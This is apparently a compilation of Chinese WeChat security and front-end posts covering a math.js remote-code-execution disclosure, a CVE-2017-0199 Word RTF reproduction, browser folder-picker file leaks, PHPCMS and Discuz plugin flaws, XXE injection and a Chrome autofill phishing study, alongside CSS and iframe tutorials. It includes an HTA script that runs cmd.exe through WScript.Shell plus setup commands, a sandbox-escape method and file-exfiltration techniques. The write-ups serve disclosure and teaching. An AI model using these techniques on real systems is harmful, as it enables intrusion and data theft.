关注我们

阅读原文

跳转微信打开

快看~~ js也能报洞了~~

本文简要介绍了如何发现，利用和报告远程代码执行（RCE）漏洞。也就是说这是一个发现漏洞，并负责任的报告它们的指南。

在使用封装了math.js API的工具时（http://api.mathjs.org/v1/?expr=expression-here），我们发现了它似乎可以执行javascritp代码，尽管有一些限制：

特别要说的是， eval被替代为了一个安全版本。Function和setTimeout/ setInterval也不能使用：

现在我们发现代码执行有一些限制，我们得绕过他们。

有四种标准方法来执行JavaScript中的字符串：

• eval("code")

• new Function("code")

• setTimeout("code",     timeout)

• setInterval("code",     interval)

在math.js环境中，这些不能直接访问，因为它们没有被定义，或者被安全函数重新定义了。但是，它们可以间接访问：特别是Function可以作为现有函数的构造函数间接访问 - 这是导致发现漏洞的关键。

例如，Function("return 1")可以替换为Math.floor.constructor("return1")。所以要执行return 1，我们可以用Math.floor.constructor("return1")()。

我们知道在math.js环境下cos是一个函数，所以我们使用：

> !calc cos.constructor("return 1")()

Result: 1

成功！

这样我们就可以简单的require一些本地模块，并获得对操作系统的访问权限，是吗？不，并没有那么快：尽管math.jsAPI服务器在Node.js环境中运行，我们却无法使用require。

> !calc cos.constructor("return require")()

Error: require is not defined

但是，我们可以使用process，它有一些很赞的功能：

虽然process.env包含了丰富的信息，但它不能真正做任何有趣的事情：我们需要更深入，使用process.binding，它让Javascript绑定到操作系统。虽然他们没有官方文档，并且在内部使用，但可以通过阅读Node.js源代码来重构其行为。例如，我们可以使用process.binding("fs")在操作系统上读取任意文件（在适当的权限下）：

为了简洁起见，我们将跳过!calc cos.constructor("code")包装器，并粘贴相关的JS代码。

我们马上就要完成了：现在我们需要找出一种打开shell并运行任意命令的方法。如果您有Node.js的经验，您可能知道child_process，它们可以通过spawnSync生成进程：我们只需要使用操作系统绑定来复制此功能（请记住，我们无法使用require）。

这比看起来简单：您可以直接使用child_process源代码，删除不需要的代码（未使用的函数和错误处理），将其减小并通过API运行。

这样，我们可以生成任意进程并运行shell命令：

现在我们发现了一个漏洞，并最大化的利用了它，我们需要决定如何处理它。因为我们是利用它找一些乐趣，并没有恶意的意图，那么就走把它报告给维护者并成为“白帽子”的这条路。我们通过维护者GitHub上的个人资料上的电子邮件地址联系了他，邮件细节如下：

• 漏洞的简短描述（mathjs.eval中的远程代码执行漏洞）;

• 一个攻击实例，演示它是如何工作的（总结为什么cos.constructor("code")()可以执行和通过process.bindings可以执行什么）;

• 在可用服务器上的演示（我们演示了输出whoami和uname -a）;

• 如何修复的建议（例如在Node.js中使用vm模块）。

  
  

在两天的时间里，我们协助作者一起修复了这个漏洞。值得注意的是，在他发布了一个修复（2f45600）之后，我们发现了一个类似的漏洞（如果你不能直接使用构造函数，可以使用cos.constructor.apply(null,"code")()），这个在（3c3517d）中被修复。

• 2017年3月26日22:20 CEST：第一次成功利用

• 2017年3月29日14:43 CEST：向作者报告漏洞

• 2017年3月31日12:35 CEST：报告第二个漏洞（.apply）

• 2017年3月31日13:52 CEST：这两个漏洞被修复了

• 
  

此漏洞由@CapacitorSet和@denysvitali发现。感谢@josdejong及时修复漏洞和JSFuck发现[].filter.constructor技巧。

Jos澄清：math.js并不像之前说的那样“执行 JavaScript”，而是“使用自己的数学语法、自己的运算符、函数制作自己的解析器，但这些函数当然还是JavaScript函数“。

原文链接在阅读原文中~~

安全&前端

长按二维码
关注我们

阅读原文

跳转微信打开

这word有毒~

4月11日，Microsoft Office 爆出了首个漏洞--Microsoft Office RTF漏洞（CVE-2017-0199），这个漏洞可以影响以下系统：

• Microsoft Office 2016

• Microsoft Office 2013

• Microsoft Office 2010

• Microsoft Office 2007

当用户打开包含嵌入式漏洞的文档时，这个就会下载并执行包含PowerShell命令的Visual Basic脚本。

微软官方对该漏洞的通告：https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199

漏洞复现

首先我们需要一个Apache服务器、一个POC、一个Word，一个沉着冷静的内心和一个帅气的微笑~

apache

apache需要开启DAV支持，为了方便。

这里我使用了docker来搭建，写了如下Dockerfile：

docker build -t cve-2017-0199 .

docker run -d -p 8881:80 cve-2017-0199

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close();
</script>

docker exec -it 容器ID /bin/bash

mkdir /var/www/html/test/

docker cp `pwd`/test.docx 容器ID:/var/www/html/test/

cd /var/www/html/test/
mv test.docx test.rtf

echo "<script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close();
</script>" > test.rtf

vi /etc/apache2/apache2.conf

<Directory />  
Dav on  
</Directory>  
<Directory /var/www/html/test/>  
Header set Content-Type "application/hta"  
</Directory>

service apache2 restart

安全&前端

长按二维码
关注我们

阅读原文

跳转微信打开

震惊！原来上传文件夹功能还可以这么玩……

你知道可以把常用的文件选择器变成文件夹选择器吗？把属性“webkitdirectory”添加到 type ='file' 的input标签上即可。 
显然，与文件选择器不同，你最终会可以通过这个选择器加载所选文件夹中的所有文件。显而易见,这有一个明显的bug，所以在一系列尝试之后，我最终在三个主要的浏览器中测到一些漏洞。 
我会分别写每个浏览器，因为每个浏览器的案例与其他浏览器的都有所不同。

火狐浏览器

我已经提交了火狐浏览器webkitdirectory属性的三个不同的漏洞。幸运的是，这个文件夹选择功能仅在Mozilla的Nightly浏览器中实现，这个浏览器是在稳定版本发布之前测试新功能的用的。
Bug 1295914 - webkitdirectory可以用来诱骗用户允许访问任意文件夹（SEC-MEDIUM）
我报告的涉及文件夹选择器的第一个漏洞是错误的表示符号。这个漏洞受到[1]一个谷歌已经修复的早期的bug的启发， 其中出现了关于交互提示描述不清楚的问题。这可能导致那些无意识的用户受到欺骗。 

[1]https://bugs.chromium.org/p/chromium/issues/detail?id=252888

Bug 1319370（CVE-2017-5414）webkitdirectory - 操作系统用户名泄露（SEC-MEDIUM）
我认为第二个错误是实现完整的本地文件泄露的关键因素。这里的问题是，当一个文件选择器被打开一次，那么第二次打开它会向后退到上一层文件夹。

所以我做了一个PoC，它展示了，如果我们让一个被攻击者一直按着'Enter'键，同时我们弹出一个文件夹选择器，这将导致用户在无意识下“选择”文件夹。

为了获取操作系统用户名，被攻击者需要在弹出两次文件选择框时一直按住‘enter’键即可，因为（在Windows上）文件选择器默认目录是'C:\ Users\ {username}\ Desktp\'。 
这是当我们试图利用这个漏洞时所需要的主要用户交互，它受到了早期Mozilla bug的启发。

另一种方式是欺骗用户反复选择一个确定的路径并弹出文件夹选择器，这样“确认选择”按钮将被自动按下。 
Bug 1338637 - 任意的本地文件输入泄露[webkitdirectory]（SEC-MEDIUM）
我发现如果你可以在用户按下“Enter”键的时弹出一个文件选择器，那么我们可以欺骗用户让我们可以访问默认目录下的所有文件。这有一些限制，因为在Windows操作系统上，似乎只有“我的文档”文件夹会受此影响。

如果它是一个不同的文件夹，如“桌面” （默认的）它不会加载任何东西。这在其他任何操作系统上是不同的。

幸运的是，我们之前有一个漏洞，在使用了文件夹选择器后文件路径会到达上层，所以我在我的漏洞报告中使用了这一点。
以下是原始的PoC报道。请注意，第一个漏洞并没有真正的PoC代码（除了filepicker html），我把第二个和第三个漏洞组合成了一个PoC。

微软Edge

我报告了IE Edge浏览器的一个类似的bug，区别在于默认目录是“我的文档”，因此，我展示了文件夹选择器可以获取被攻击者的文档文件夹的所有文件

这个bug目前已经被修复了

原始的POC：

谷歌浏览器

Google是我联系的第一个确认这个问题的厂商。在最初收到SEC-MEDIUM评级，后来更改为SEC-LOW并忽略了几个月（〜6）。事实证明，如果有人试图上传大规模的文件时chrome可以检测到这种类型的bug，因为它是记录在浏览器安全日志中的
但是我仍然感到困惑，但是我相信他们的意思是，他们可以检测和阻止任何突然大量使用上传文件夹功能的恶意网站。在2017/4/13日写这篇文章的时候，提交给微软的POC仍然能够使用。

最糟糕的是，如果文件夹选择器被默认在C:\，你将可以读取整个硬盘，因为文件夹选择器会上传所有子目录下的所有文件。

参考文献：

[1]任意本地文件披露输入[webkitdirectory]错误报告： https : //bugzilla.mozilla.org/show_bug.cgi?id=1338637 
[2]（CVE-2017-5414）webkitdirectory - 操作系统用户名泄露：https://bugzilla.mozilla.org/show_bug.cgi?id=1319370 
webkitdirectory可以用来诱使用户允许访问任意文件：https://bugzilla.mozilla.org/show_bug.cgi?id=1295914 
[3]（CVE-2016-7239）微软Edge信息泄露漏洞：https://technet.microsoft.com/library/security/mt674627.aspx 
[4]Google错误报告：https://bugs.chromium.org/p/chromium/issues/detail?id=637098

作者：Abdulrahman Al-Qabandi

出处：http://leucosite.com/Chrome-Firefox-Edge-Local-File-Disclosure/

安全&前端

长按二维码
关注我们

阅读原文

跳转微信打开

iframe太麻烦了，记录一下，以后用可以直接粘贴了~

    1. iframe定义

    2. 什么是同源策略

    3. 父子及多层间互取元素

    4. 父子及多层间元素修改

iframe定义

name：可以用作<a>标签，<form>标签的target属性值，或<input> 标签和 <button>标签的formtaget属性，点击a标签后，会把href的网址引入到iframe。

srcdoc：该属性值可以是HTML代码，最好能与sandbox一起使用。

sandbox：通过不同属性定义为iframe增加限制条件，多个条件用空格分开。

1. allow-forms: 允许iframe内容可以提交表单。

2. allow-modals: 允许iframe内容打开模态窗口。

3. allow-orientation-lock: 允许iframe内容禁用屏幕朝向锁定。

4. allow-pointer-lock: 允许iframe内容使用鼠标锁定API.

5. allow-popups: 允许打开新窗口 (类似window.open, target="_blank", showModalDialog)。

6. allow-popups-to-escape-sandbox: 允许打开新窗口，新页面不强制受到沙箱相关限制。

7. allow-presentation: 是否iframe启用一个展示会话。

8. allow-same-origin: 将内容作为同源对待。如果未使用该关键字，嵌入的内容将被视为一个独立的源。

9. allow-scripts: 允许嵌入的iframe运行脚本，否则不能运行。

10. allow-top-navigation:允许嵌入的页面的上下文可以导航（加载）内容到顶级的浏览上下文环境（browsing context）。

同源策略

同源策略即SOP，是万维网的核心安全机制，通过比较URL中的主机名（主域名）、协议及端口，来判断是否是同源，三者全部相同则视为同一个来源，有一个不同即为不同来源的资源。

这里有一点需要注意，主域名相同的情况下，子域名不同也是跨域的。

父子之间互取元素（同域）

tip:elemframe，elemframe1（第一次iframe），elemframe2（和1并列的iframe），elemframe3（嵌套在1中的iframe）皆为iframe 的名字和id。elem1js(1~3)为不同子页面名称,testfun1(),testfun3()为不同子页面的函数。

‍

父页面获取子页面元素

子页面获取父页面元素

父页面监听子页面元素事件

子页面监听父页面元素事件

父页获取子页面js变量及函数

子页面获取父页面js变量及函数

父页获取子页面cookie

子页面获取父页面及并列页面cookie

第二层子页面相关操作

Demo地址：http://works.enjoyfe.com/iframe/parent_def.html

安全&前端

长按二维码
关注我们

阅读原文

跳转微信打开

潜伏了一年多的漏洞终于被大佬爆出来了~

前几天就听朋友说PHPCMS最新版出了几个洞，有注入还有任意文件上传，注入我倒不是很惊讶，因为PHPCMS只要拿到了authkey注入就一大堆……

任意文件上传倒是很惊讶，但是小伙伴并没有给我EXP，今天看到了EXP，但是没有详细分析，那我就自己分析一下好啦。

首先去官网下一下最新版的程序，搭建起来。

为了方便各位小伙伴复现，这里附上最新版的下载地址：

漏洞复现

漏洞复现的办法是先打开注册页面，然后向注册页面POST如下payload：

然后就会报错并返回shell地址：

然后就可以连接啦。

漏洞分析

通过复现过程可以看到漏洞URL为：

可以确定是member模块的问题，以前我分析过phpcms的程序，所以就不从index.php看了，我们直接去打开member模块的控制器文件如下：

安全&前端

长按二维码
关注我们

阅读原文

跳转微信打开

老司机带你学 XML实体注入的几种姿势~

目录

1. XML基础

2. XML实体注入漏洞的几种姿势

3. 防御XML实体注入漏洞

XML基础

XML是一种用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素。

XML技术基础我在这里将不在详细解读，有兴趣的小伙伴可以通过如下几个链接去学习XML基础：

• https://www.xml.com/axml/axml.html

• http://www.w3school.com.cn/xml/index.asp

• https://www.ibm.com/developerworks/cn/xml/x-newxml/

当然还是建议读者详细阅读以上任意一个文档并实践之后再继续往下看，以免造成知识跨度太大，看不懂或一知半解的情况。

XML实体注入基础

当允许引用外部实体时，通过构造恶意内容，可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。

简单了解XML以后，我们知道要在XML中使用特殊字符，需要使用实体字符，也可以将一些可能多次会用到的短语(比如公司名称)设置为实体，然后就可以在内容中使用。

如下就声明了一个名为coname值为QiHoo 360的实体。

要在XML中使用实体，使用&coname;即可。

为了演示漏洞，我们写一个简单的PHP脚本，如下：

假设这里我们希望用户输入的是：

然后就可以返回如下页面：



XML实体注入漏洞的几种姿势

方法1：

方法2：

其中attack.dtd的内容为：

方法3：

其中attack.dtd内容同上不变。

利用xml实体注入我们可以读取本地任意文件。

读取任意文件的思路大概就是引入一个实体，实体内容为本地文件。

使用我们如上说的任意一种方法即可实现，我这里使用第一个（因为最方便）。

构造payload如下：

可以看到成功读取了/etc/passwd文件。

如果我们实战中所在的场景下XML并没有回显，我们也可以使用另外一种方法读取文件。

其中attack.dtd的内容为：

发送payload以后就可以在http://www.hackersb.cn/的访问日志中看到请求且带上了/etc/passwd文件base64加密以后的内容：

我们既然可以使用file协议读取本地文件，当然也可以使用http协议访问来造成SSRF攻击，甚至可以使用gopher协议。

具体能使用的协议主要取决于PHP，PHP默认支持file、http、ftp、php、compress、data、glob、phar、gopher协议。

如果PHP支持except协议，我们还可以利用except协议来执行系统命令。

简单的SSRF攻击实例如下：

然后就可以监听到访问了。

SSRF攻击可以成功的话，我们自然可以进而攻击企业内网的系统。

其他更多的危害各位可以参考OWASP出的文档：

https://www.owasp.org/images/5/5d/XML_Exteral_Entity_Attack.pdf

防御XML实体注入漏洞

• 禁用XML使用外部实体

• 尽量不要让用户直接提交XML代码,如果一定要,请做好过滤。

安全&前端

长按二维码
关注我们

阅读原文

跳转微信打开

所以以后要用console.log()?

Chromium工程师正在计划并讨论改变JavaScript弹出窗口在Chrome和其他类似浏览器中的工作原理。

在Google Developers门户网站上发布的一项提案中[1]，Chromium团队承认JavaScript弹出窗口过去一直在伤害用户。

同时，JavaScript弹出窗口已被用于将用户重定向到恶意软件下载，这些打扰用户的对话通常还是基于web威胁的操作的核心，也称为技术诈骗。

问题在于JavaScript弹出窗口通常阻止对整个浏览器的访问，除非用户手动关闭该弹出窗口。

在许多情况下，骗子构建了无限循环的JavaScript，使用户在停留在不可靠的网站上。这些策略被称为“browser lockers”，与勒索软件工作方法类似，尽管它们更容易被删除，并且不会由于加密而导致的任何数据丢失。

让Chrome JS弹出窗口只在单个选项卡上工作

为了应对这种威胁，Google工程师表示，他们计划让javascript模态窗口，如alert()，confirm()和dialog()方法，仅在单个选项卡上上工作，而不是单个窗口。

这种更改意味着弹出式窗口不会阻止用户切换和关闭该选项卡，从而结束网站所有者的任何过于激进的策略。

本周发布的Safari 9.1也发生了类似的变化。苹果公司的这个决定是在恶意软件使用Safari中的一个bug，通过弹出窗口将用户留在这个恶意页面，然后进行敲诈收费，构成了勒索软件[2]后制定的。。

Google自2016年7月起就对此调整进行了讨论

谷歌移动JavaScript弹出窗口到选项卡的决定没有时间表，但Chromium 的工程师自从2016年7月[3]一直把这个问题作为Project OldSpice[4]的部分项目在讨论。

与此同时，Google正在要求网络开发人员考虑使用新技术作为经典alert()、confirm()、和dialog()函数的替代方法。

例如：

• 通知API - 用来通知用户工作事件（例如日历网站）

• HTML<dialog>元素 - 用于获取用户输入

• Devtool的console.log（document.origin） - 用于验证XSS

  
  

“由于这些变化，如果您的站点使用对话框，强烈建议您转向使用前面提到的替代方案，这样将不会受到影响，”Google的工程师说。“Chromium团队强烈建议您不要使用JavaScript对话框。”

[1]. https://developers.google.com/web/updates/2017/03/dialogs-policy

[2]. https://www.bleepingcomputer.com/news/security/yesterdays-ios-10-3-update-bring-safari-ransomware-campaign-to-an-end/

[3]. https://bugs.chromium.org/p/chromium/issues/detail?id=629964

[4]. https://docs.google.com/document/d/1wtV5rmLhbf1OZkbg7crtCt6h1mMtig_ctTQt3BLLEIU/edit

作者：Catalin Cimpanu 

来源：https://www.bleepingcomputer.com/news/security/google-wants-to-change-javascript-popups-after-abuse-from-tech-support-scammers/

安全&前端

长按二维码
关注我们

阅读原文

跳转微信打开

flex-box还没用6，css grid布局又来了~前端的你们怕不怕？

Chrome57版本支持了一种新的CSS布局——网格布局（CSS Grid Layout）。用水平的和垂直的网格线把页面分成不同的单元格，在使用的时候，可以通过网格线的位置定义单元格，还可以跨单元格定义区域。这种方式可以为每个区域命名，在做媒体查询适配的时候，非常方便布局。

下图展示了网格布局的主要方式：

首先定义一个容器，设置容器的display属性为grid。然后通过grid-template-columns和grid-template-rows属性定义网格的列数和行数。列和行之间是有grid-line的，我们可以通过线的位置来定义boxa的位置。

代码中，定义boxa的位置grid-column为从第一条垂直线，到第5条垂直线之间的区域,grid-row为定义从第一条平行线到第二条平行线之间的区域，就是第一行，也就是header的范围。 注意，在这里线是从1开始数的。

效果如图所示：

在boxa中还定义了grid-area属性，这个属性和wrapper中的grid-template-area属性对应，用来给这个区域放置具体的位置。这样，在用媒体查询适配的时候，可以直接通过定义grid-area来直接布局。

同时，我们给b,c,d板块的area分别命名如下：

在进行媒体查询的时候，我们可以直接用area排版如下：

除了这些，网格布局还有什么特点呢？它还提供了对齐的属性： 

align-content : start/end/center

justify-content : start/end/center/space-evenly

这两个属性用来定义所在区域的对齐方式。

下图就是整个wrapper的justify-content:end对齐方式。我们看到，右侧并没有完全紧贴外面的框，是因为我们设置了gird-gap间距。

安全&前端

长按二维码
关注我们

阅读原文

跳转微信打开

说人话，分享一下催更两周的经验……

公众号什么时候更新啊？

说好的周更变成月更了啊？

关注了之后，公众号还没更新过呢，什么时候更啊~？

……

…

.

请相信小编一直在催更，而且是仔细研读并实践从古至今的各家催更方案，三十六计都烂熟于心，可是……似乎百年前的方案并不能对现在的问题有任何效果。且听我娓(zhua)娓(kuang)道(jiang)来(shu)~

我：你最近研究什么了吗？

他：嗯，看了*&%…………&*（

我：哦，可以啊，看起来很高端~

他：嗯，还可以吧，%%…………&……*（*&…………&……%%……（脑补3分钟天书）

我：那写篇文章吧，跟大家分享一下~

他：不行，还不到位，还没有深度……等我再研究研究~

我：……

我：刚才我看留言，好多人在催更啊~

他：哦，是该更了~

我：有人说这都好久了啊，好期待看你最近研究的技术啊~

他：最近是有在研究~

我：这个人说他等了一周了啊，等女票都没这么等过啊~（这是我编的）

他：啊？真的？

我：这个人说他每天早晨第一件事就是打开公众号看一眼啊~~

他：你再编，搞安全的没有早晨，也没女票~

我：……

我：我也想了解了解安全，不如你教我吧~

他：你太笨，学不会~

我：不不，我和大家一起学，你可以发一些简单点的安全基础文章~但是有点深度~这样大家都能懂了~你看，我总结了一篇关于CSRF的，你再深挖一下呗~

他：基础文章？为什么不去看书……看视频……

我：……

（参加阿里先知大会回来）

我：今天会上好多议题，看着好有深度好高端啊~

他：是啊，都是大佬~

我：咱们公众号要更新了~

他：一会儿我有CTF要打……

我：……

我：你把最近挖洞经验分享一下吧~

他：哦~
（10分钟后……）

我：你把最近挖洞经验分享一下吧~

他：哦~
(20分钟后……)

我：你把最近挖洞经验分享一下吧~

他：哦~
（30分钟后……）
我：你在写吗？
他：没~在看技术文章~
我：……

其实，小编也理解，他一直都很忙，忙着研究奇怪的东西，忙着写一些打算开源的工具，忙着参加一些会议~~同时也很想保证自己文章的质量和深度，这跟他有时候贪睡一点关系都没有。

催多了，小编也担心他会发脾气，可即使这样，小编也会一直催更下去的，催到海枯石烂，催到天地变色，催到怀疑人生~~

阅读原文

跳转微信打开

可以在网页中优雅的引入各种好看的字体啦~

字体是网页的灵魂之一，好看的字体总是更容易吸引用户。可是由于网页使用的字体需要受制于操作系统，如果用户的操作系统没有安装某个字体，网页则会退而求其次的使用系统自带的字体。

因此我们并不能随便使用一些好看的字体，只能选用一些安全字体。比如：Helvetica，Arial，宋体，微软雅黑，每次都会被设计妹子喷shi，如果能在网页上使用好看的字体就好了~~

可是引入字体对于英文来说，是合适的，因为字体文件本身不大。但是对于中文字体，一个字体文件就好几M，既耗费流量，又拖慢了加载速度，还会出现加载后字体突然变化的情况，简直不能忍，尤其是对于移动端来讲，非常不划算。

做为一个有追求的前端，我也想做出一个有个性的网页啊，怎么能只用这一种字体呢？

于是，我们可以使用以下的方法，引入其他的字体。 

这样我们的网页就可以使用任意的字体了,不用担心中文字体过大影响加载了，不过，如果后期修改文案，尽量要是网页中出现过的字，如果修改的文字有新的字 ，则还需要在用原来完整的ttf字体文件，重新上传一遍。

使用中不需要安装任何的工具~~是不是超想试试，点击原文就可以感受啦。

要在PC端哦~

tips：还在测试中，请大家热情的提意见哦~

工具地址：http://everyfont.enjoyfe.com

安全&前端

长按二维码
关注我们

阅读原文

跳转微信打开

​千里之堤，溃于蚁穴。插件的安全也不能忽视，掏出0day就是一把梭。

Discuz介绍

Crossday Discuz! Board（简称 Discuz!）是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统。自2001年6月面世以来，Discuz!已拥有15年以上的应用历史和200多万网站用户案例，是全球成熟度最高、覆盖率最大的论坛软件系统之一。目前最新版本Discuz! X3.2正式版于2015年6月9日发布，首次引入应用中心的开发模式。2010年8月23日，康盛创想与腾讯达成收购协议，成为腾讯的全资子公司。（摘自百度百科）

Discuz代码非常灵活，支持自定义模板和插件，这让Discuz拥有了极强的DIY性，再加上操作简单快捷，入门门槛低，使得这款开源软件在中国发展异常迅猛，成为市面上主流的论坛程序。

本文主要介绍Discuz插件相关的安全问题。

Discuz插件介绍

Discuz插件主要分为“程序链接”、“扩展项目”、“程序脚本”三类。

程序链接：允许插件在Discuz中某些特定导航位置加入菜单项，可自主指派菜单链接的 URL，也可以调用插件的一个模块，模块文件名指派为 source/plugin/插件目录/插件模块名.inc.php”。

注意：由于引用外部程序，因此即便设置了模块的使用等级，您的程序仍需进行判断使用等级是否合法。

扩展项目：允许插件在更多的位置增加菜单项/管理模块，以及可在后台插件列表页增添一个远程链接(X3.1新增)。

程序脚本：允许插件设置一个包含页面嵌入脚本的模块，该模块可用于在普通电脑及移动端访问的页面显示。模块文件名指派为 “source/plugin/插件目录/插件模块名.class.php”，以及设置一个特殊主题脚本的模块，模块文件名指派为“source/plugin/插件目录/插件模块名.class.php”。

可以为每个模块设置不同的使用等级，例如设置为“超级版主”，则超级版主及更高的管理者可以使用此模块。

扩展项目模块可以在社区的特定位置扩展出新的功能，通常用于扩展新的设置项目。项目的脚本文件以 .inc.php 结尾（如 test.inc.php），模版为固定文件名，位于插件目录的 template/ 子目录中，文件名与脚本名同名（如 test.htm），扩展名为 .htm。添加相应的扩展项目模块时，需注明程序模块、菜单名称。例如我们添加个人面板项目，程序模块为 test，菜单名称是“测试”，当插件启用后，个人面板即家园的设置中会出现“测试”拓展项目。

在新插件内核中，通过 plugin.php 方式访问的插件可直接通过 plugin.php?id=xxx:yyy 方式调用而无需再在后台定义为普通脚本模块，只要 source/plugin/xxx/yyy.inc.php 文件存在即可。如果 xxx 和 yyy 同名，可直接通过 plugin.php?id=xxx 方式访问。

结合实例讲解Discuz插件安全

我们知道Discuz插件主要分为“程序链接”、“扩展项目”、“程序脚本”三类。

这里我们主要着重分析”程序脚本“，因为大部分跟数据库相关及逻辑相关的代码仅能在这种插件类型中存在，存在安全问题的可能性最大。

这里我们以一款名为”小说阅读器“的插件为例，深入了解Discuz插件机制及漏洞挖掘。

首先我们安装并启用该插件：

随后首页多出了一个”小说主页“的导航：

我们可以看到当前的url是plugin.php?id=xxx:xxx上面我们已经讲过这种格式的页面访问到的最终文件在插件目录下xxx.inc.php文件中。

那么这个“小说主页”的相关文件就在jameson_read目录下的readmain.inc.php中：

我们查找并打开相关文件：

跟我们预想的一样，这个文件果然是存在的。我们来输出些数字然后exit()确认一下我们的想法：

查看页面：

OK，现在我们继续来看这个插件的逻辑是怎么样的，是不是有相关的安全问题存在。

其中第7行：

很明显，从get请求中获取了orderfield赋值给$orderfield并且只使用trim()函数进行了处理，这里明显是有问题的。

继续往下跟进发现传进了fetch_by_get函数的第3个参数：

继续跟进fetch_by_get函数，文件路径在：/Users/striker/www/discuz3/upload/source/plugin/jameson_read/table/table_jamesonread_books.php第120行：

发现将$orderfield直接传入了Discuz自带的DB::fetch_all函数中执行，我们继续跟进fetch_all函数：

这个函数将sql语句又传入到self::query函数：

这个函数又调用了self::format()进行格式化语句：

这个函数首先判断了%出现的次数，如果没有出现则扔出错误。

然后写两个一个while循环来拼接sql语句，查找百分号后面的字母，我们这里的$orderfield传入时是%i所以我们只关注这个分支：

如果百分号后面是i的话，就直接拼接带入进去，没有进行其他的处理。

最终format函数返回了拼接后的sql语句。

为了验证我们的想法，我们来在返回以后输出一下返回的sql语句，我们提交orderfield为111select：

最终SQL报错，可以看到我们的数据是带入到SQL查询中了。

我们可控的注入点是在ORDER BY后面，

而且Discuz现在是有一个全局的waf，过滤了一些字符，导致很难进行注入。

后面有机会再发一篇DiscuzWAF相关的文章吧。

最终使用如下payload成功注入：

这里感谢@mLT 以及@雨了个雨 师傅不吝赐教。

结语

Discuz是当下比较火的一个论坛社区程序，很多的网站，尤其是某些建站公司为了完成目标，肆意使用各种插件，甚至是没有经过官方审核的第三方插件（当然，经过审核的也会出现安全问题），导致原本很安全的Discuz变得脆弱。

使用第三方的插件，还是找时间多review code比较好呀。

安全&前端

长按二维码
关注我们

阅读原文

跳转微信打开

“诶？这张照片是谁手机拍的？”“我的啊”

“骗人！这张照片里元数据记录的厂商和你现在这个不一样！是不是隔壁小妖精的？”

“是用她手机拍的，听我解释啊~“

Exif的意思是“可交换图像文件“，在jpeg的格式头部插入了数码照片的信息，包括拍摄参数，如光圈、快门、焦距和日期时间、拍摄设备的品牌、型号等，以及缩略图和其他信息。

起初记录这些信息是为了帮助摄影爱好者分析自己在不同器材，不同环境和不同设备设置下拍摄的效果，帮助他们不断改进并提高自己的水平。

通过此数据还可以协助处理图片，防止失真。一些地方也会使用它做原图检测，因为在编辑软件中修改后，一些技术信息会丢失，同时Exif也会保存历史记录。

可是，另一方面，由于Exif记录的元数据信息非常丰富，会暴露一些你不想让别人知道的个人的信息，比如:

你拍照使用的设备，是佳能？佳能的某个型号？还是某款手机？

你拍摄照片的地理位置（GPS定位）。

你拍摄照片的时间。

你是否在软件中修过图。

...

Exif怎么看?

可以使用一些专用软件，比如JPEGsnoop、MagicEXIF，也可以使用Photoshop的文件简介功能查看~

上传到网络上的图片还可以使用exifjs在浏览器中打印出来。

测试地址：http://works.enjoyfe.com/blogDemo/exifdemo/exif.html (或者点击阅读原文)

下图是一个例子，上传了一张原图，可以打出Exif里的所有信息。

截图中可以看到，Exif中存储了我们的相机型号、GPS信息，拍摄时间等信息。如果在不知情的情况下上传到网上，很有可能被利用。

函数：canvas.toDataURL(type, encoderOptions);
用来返回代表画布图像数据的字符串，也就是图片的base64，可以使用 type 参数其类型，默认为 PNG 格式。

如果type传入的是 image/jpeg或者 image/webp,那么就可以设置encoderOptions了，这个参数是图片质量，取值范围为 0 到 1 。

在测试网址中，通过点击下载图片，将会使用这种方式下载一张没有exif信息的图片。

当图片过大的时候，下载会出现失败的情况，我们可以在canvas上右键保存，同样可以去掉图片的Exif信息。

当然，利用一些专业的软件也可以将exif信息去掉，如使用Photoshop的存储为web所用格式。

现在大家非常喜欢在一些网站上传照片，分享风景，晒自拍，传图的时候可千万要注意呀~~

过年大家一定朋友之间发送了不少原图吧~~

安全&前端

长按二维码
关注我们

阅读原文

跳转微信打开

Chrome浏览器“自动填充”功能安全性研究

并提供了一段js来演示漏洞：

仅测试这段js，发现并不能复现此漏洞，但是这个思路引起了我的思考。

再次研究发现，html中要实现浏览器中的表单自动填充主要依靠于autocomplete属性。

起初autocomplete属性只支持on或off。比如下面代码：

上面代码开启了整个表单的autocomplete却对email关闭了autocomplete，我们在点击非email的其他字段即可打开自动填充功能：

但在email中不能展开自动填充功能：

后来HTML5标准加入了对autocomplete的支持，并且给autocomplete加入了更多的标示符，以保证让浏览器准确的知道哪些信息对应着表单里的哪些字段。

比如如下代码：

在autocomplete属性中写入了语义化的字符，比如name、street-address等。

通过这些标识，浏览器即可准确的把相应的信息填入到相应的表单中。

03/钓鱼网站可能会这么用

通过如上demo我们可以发现，当我们选择自动填充以后，chrome不仅会把当前表单字段填充到input中，也会把其他表单字段填充到input中。

那么如果写一些type为hidden的input标签，并且加上autocomplete属性，chrome是否会自动补上带有hidden属性的input标签的信息呢。

我们使用如下代码：

将第一个姓名字段设置为hidden，然后使用自动填充，并且提交表单，查看请求包：

发现type属性为hidden的表单并没有获取到，但其他非hidden的信息都拿到了。

既然type设置成hidden浏览器不会发送数据，隐藏浏览器元素还有很多方法，比如：

在表单外层放一个div,让整个div,display:none。

然而也是不行的：

看来chrome已经在这里做了足够防护。

其实在文章最初提供的js代码也是使用这样的方式来进行攻击的。

现在已经被修复了。那么还有别的办法吗？

04/可利用的方式

让浏览器认识且没有做防护，并且让用户看不见这个表单的方法有很多，比如如下方法：

效果如下：

bingo！！

这种方式浏览器并没有防护，其实让用户看不到表单的方式还有很多，还比如设置成透明等等……

由此想到，如果钓鱼网站利用了这个功能，在用户不知情的情况下，拿到用户浏览器存储的其他信息，会造成很可怕的后果。

在线测试地址：http://www.hackersb.cn/poc/autofill/

05/如何防护

既然这个功能是浏览器的功能，在浏览器还未完全将不可见的表单字段设置为不可填充之前，我们只好通过设置，来避免使用这个功能。

通过打开chrome浏览器的设置--高级设置，然后点掉下图中的复选框，关闭自动填充功能。

06/参考资料

1. HTML标准 - 表单自动填充

2. SegmentFault

阅读原文

跳转微信打开

两只web 🐶开了个公众号~

王松_Striker

Jess_喵

然后

